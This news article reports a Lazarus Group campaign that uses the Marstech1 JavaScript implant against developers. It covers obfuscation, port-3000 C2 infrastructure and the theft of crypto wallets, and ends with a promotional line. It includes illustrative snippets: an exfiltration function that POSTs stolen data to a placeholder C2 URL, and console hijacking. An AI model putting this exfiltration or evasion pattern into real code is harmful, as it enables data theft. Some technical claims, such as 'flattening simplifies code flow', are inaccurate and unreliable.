Lazarus Group Using New Malware Tactic To Attack Developers Globally

The notorious Lazarus Group in a recent escalation of cyber threats linked to North Korea, has unveiled a sophisticated new tactic to target developers worldwide.

This campaign, dubbed “Operation Marstech Mayhem,” involves the deployment of an advanced malware implant known as “Marstech1.”

The operation marks a significant evolution in the group’s supply chain attacks, leveraging novel obfuscation techniques and unconventional command-and-control (C2) infrastructure.

Marstech1 is a JavaScript-based implant that is is designed to collect system details, including hostname, platform, and home directory, facilitating reconnaissance on target machines.

It employs advanced obfuscation methods such as control flow flattening, self-invoking functions, random variable and function names, Base64 string encoding, and anti-debugging checks.

While the security researchers at SecurityScoreCard noted that these techniques make it challenging to detect when embedded in legitimate software packages or websites.

  // Example of Obfuscated JavaScript
  var a = "Base64 encoded string";
  var b = atob(a); // Decoding Base64

The C2 server operates on port 3000, utilizing Node.js Express on the backend, a departure from previous operations that used ports 1224 and 1245.

This setup is hosted by Stark Industries LLC and lacks the React web admin panel seen in earlier campaigns.

  # NMAP Scan Example
  nmap -p 3000 <target_IP>

STRIKE identified a GitHub profile, “SuccessFriend,” linked to the Lazarus Group. This profile has been active since July 2024 and includes both legitimate and malicious code repositories.

The profile’s focus on web development and blockchain aligns with the group’s interests.

  # SuccessFriend GitHub Profile
  - **Web Development Skills**
  - **Blockchain Learning**

Obfuscation Techniques

Here below we have mentioned all the obfuscation techniques:-

• Control Flow Flattening: Simplifies code flow to evade detection.
• Random Variable and Function Names: Makes reverse engineering difficult.
• Base64 Encoding: Encodes data to avoid detection.
• Anti-Debugging Checks: Prevents analysis by detecting tampering attempts.

The Marstech1 implant is engineered to scan systems for cryptocurrency wallets like Exodus and Atomic on Linux, macOS, and Windows.

It extracts file contents and metadata, sending them to the C2 server via HTTP POST requests.

   // Example of Data Exfiltration Function
   function exfiltrateData(data) {
     var payload = {
       data: data,
       timestamp: Date.now(),
       type: "marstech1"
     };
     // Send payload to C2 server
     request.post("https://C2_URL/uploads", payload);
   }

The malware employs advanced anti-analysis techniques to evade detection. It uses one-time execution wrappers to prevent repeated execution of critical functions, making it harder for security tools to analyze its behavior.

It also hijacks the console methods to obscure debug output, further complicating efforts to track and mitigate its activities.

   // Example of Console Hijacking
   var originalConsoleLog = console.log;
   console.log = function() {
     // Custom logging logic
   };

The use of advanced obfuscation techniques and novel C2 infrastructure poses significant challenges for detection and analysis.

So, as a result, it is crucial for organizations to adopt robust security measures, including continuous monitoring of supply chain activities and integration of advanced threat intelligence solutions.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free